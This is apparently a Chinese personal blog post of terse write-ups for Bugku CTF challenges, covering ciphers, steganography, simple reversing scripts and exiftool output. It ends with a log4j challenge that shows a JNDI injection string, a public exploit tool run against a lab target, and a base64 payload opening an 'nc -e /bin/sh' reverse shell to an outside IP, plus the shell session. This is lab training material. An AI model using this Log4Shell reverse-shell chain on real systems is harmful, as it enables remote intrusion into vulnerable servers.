bugku随便玩玩
date
Dec 27, 2022 02:41 AM
Related to 日程数据 1 (blog)
tags
Writeup
Website
slug
bug
summary
2
抄错的字符/。-聪明的小羊ok把猪困在猪圈里telnet眼见非实pingLinux2入门逆向Easy_Re Reverse游戏过关 Reverse Easy_vb Reverselove马老师杀毒卫士NoString这是一张单纯的图片隐写赛博朋克贝斯手做题要细心-1log4j
抄错的字符
老师让小明抄写一段话,结果粗心的小明把部分数字抄成了字母,还因为强迫症把所有字母都换成大写。你能帮小明恢复并解开答案吗:QWIHBLGZZXJSXZNVBZW
而数字和字母相似的有 I(i)=>1、L(l)=>1、G(g)=>9、Z(z)=>2、S(s)=>5
/。-
..-./.-../.-/--./----.--/-../...--/..-./-.-./-.../..-./.----/--.../..-./----./...--/----./----./...../-----/....-/-----.-
嗯
不是培根
莫斯又多了
..-. .-.. .- --. ----.-- -.. ...-- ..-. -.-. -... ..-. .---- --... ..-. ----. ...-- ----. ----. ..... ----- ....- -----.-

聪明的小羊
一只小羊翻过了2个栅栏 fa{fe13f590lg6d46d0d0}

ok

就三种貌似
毫无意义的题 零实战

把猪困在猪圈里

/9j/ 不是图片吗

实锤,保存文件
这又是啥

没了
telnet
入门版de

眼见非实

这都是啥
docx 本质就是压缩包

ping

全是icmp
难道是找通的
想太多


sogo

怎么选出来各显神通吧
Linux2
没啥 分离一下

这是个幌子
这么大的文件就一张图??
strings brave |more

strings命令在对象文件或二进制文件中查找可打印的字符串。字符串是4个或更多可打印字符的任意序列,以换行符或空字符结束。 strings命令对识别随机对象文件很有用。
入门逆向


列模式 正则

Easy_Re Reverse
根据题目关键字查找

游戏过关 Reverse


换一个


# py -3
# coding:utf-8
array1 = [18,64,98,5,2,4,6,3,6,48,49,65,32,12,48,65,31,78,62,32,49,32,1,57,96,3,21,9,4,62,3,5,4,1,2,3,44,65,78,32,16,97,54,16,44,52,32,64,89,45,32,65,15,34,18,16,0]
array2 = [123,32,18,98,119,108,65,41,124,80,125,38,124,111,74,49,83,108,94,108,84,6,96,83,44,121,104,110,32,95,117,101,99,123,127,119,96,48,107,71,92,29,81,107,90,85,64,12,43,76,86,13,114,1,117,126,0]
flag = ''
for i in range(len(array1)):
flag+= chr(array1[i] ^ array2[i] ^ 0x13 )
print (flag)
Easy_vb Reverse
MCTF{N3t_Rev_1s_E4ay}

love



简单注释

import base64
s ="e3nifIH9b_C@n@dH"
flag =""
for i in range(len(s)):
flag += chr(ord(s[i])- i)
flag = base64.b64decode(flag)
print(flag)
解密
马老师杀毒卫士


def enFence(string, space):
s = ""
for i in range(0, space):
for j in range(i, len(string), space):
# 不能越界
if j < len(string):
s += string[j]
print(s)
def deFence(string, space):
s = ""
if len(string) % space == 0:
key = len(string) // space
else:
key = len(string) // space + 1
# 小于间隔继续
for i in range(0, key):
for j in range(i, len(string), key):
# 不能越界
if j < len(string):
s += string[j]
print(s)
deFence("fgaag_!l{_oun}amb_ob",3)
NoString

s="oehnl3r=<?=hF@CCGPt"
f="yelhzl)`gy|})|)oehnl3"
flag=""
for i in s:
flag= flag +chr(ord(i) ^ 9)
print(chr(ord(i) ^ 9))
print(flag)
这是一张单纯的图片


有奇怪的代码
复制走

隐写

exiftool 2.png
ExifTool Version Number : 12.30
File Name : 2.png
Directory : .
File Size : 17 KiB
File Modification Date/Time : 2017:06:07 22:26:44+08:00
File Access Date/Time : 2021:12:12 18:02:12+08:00
File Inode Change Date/Time : 2021:12:12 18:02:11+08:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 500
Image Height : 420
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Pixels Per Unit X : 4724
Pixels Per Unit Y : 4724
Pixel Units : meters
Profile Name : Photoshop ICC profile
Profile CMM Type : Linotronic
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 1998:02:09 06:49:00
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Hewlett-Packard
Device Model : sRGB
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Hewlett-Packard
Profile ID : 0
Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company
Profile Description : sRGB IEC61966-2.1
Media White Point : 0.95045 1 1.08905
Media Black Point : 0 0 0
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Device Mfg Desc : IEC http://www.iec.ch
Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant : 19.6445 20.3718 16.8089
Viewing Cond Surround : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type : D50
Luminance : 76.03647 80 87.12462
Measurement Observer : CIE 1931
Measurement Backing : 0 0 0
Measurement Geometry : Unknown
Measurement Flare : 0.999%
Measurement Illuminant : D65
Technology : Cathode Ray Tube Display
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
White Point X : 0.31269
White Point Y : 0.32899
Red X : 0.63999
Red Y : 0.33001
Green X : 0.3
Green Y : 0.6
Blue X : 0.15
Blue Y : 0.05999
Image Size : 500x420
Megapixels : 0.210
Image Width : 500
Image Height : 420
Pixels Per Unit X : 4724
Pixels Per Unit Y : 4724
信息不对等
修改一下保存


赛博朋克

java环境有点问题
Stegsolve 显示不全
pass
贝斯手


5+58==327a6c4304ad5938eaf0efb6cc3e53dcCFmZknmK3SDEcMEue1wrsJdqqkt7dXLuS


做题要细心-1

log4j
${jndi:ldap://cztlh5.dnslog.cn/exp}


存在漏洞
git clone https://github.com/black9/Log4shell_JNDIExploit.git
unzip log4j.zip
#进入目录
cd log4j/
java -jar *.jar -i 114.114.114.114 -p 8080
#开启nc监听12345端口
nc -lvn 12345
${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64/[base64加密后命令]}

还要安装环境
apt install default-jre
${jndi:ldap://102.223.75.148:1389/Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==}

➜ Log4shell_JNDIExploit git:(main) ✗ java -jar *.jar -i 102.223.75.148 -p 8080
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8080...
[+] Received LDAP Query: Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==
[+] Paylaod: command
[+] Command: nc 102.223.75.148 12345 -e /bin/sh
[+] Sending LDAP ResourceRef result for Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA== with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA== redirecting to http://102.223.75.148:8080/ExploitWyWFTkcVxR.class
[+] New HTTP Request From /114.67.175.224:46900 /ExploitWyWFTkcVxR.class
[+] Receive ClassRequest: ExploitWyWFTkcVxR.class
[+] Response Code: 200
[+] Received LDAP Query: Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==
➜ ~ nc -lvnp 12345
listening on [any] 12345 ...
connect to [102.223.75.148] from (UNKNOWN) [114.67.175.224] 42381
ls
bin
dev
etc
flag
home
lib
linuxrc
media
mnt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
cat flag
flag{60f59ffe0f15aad3d9e544fbef142349}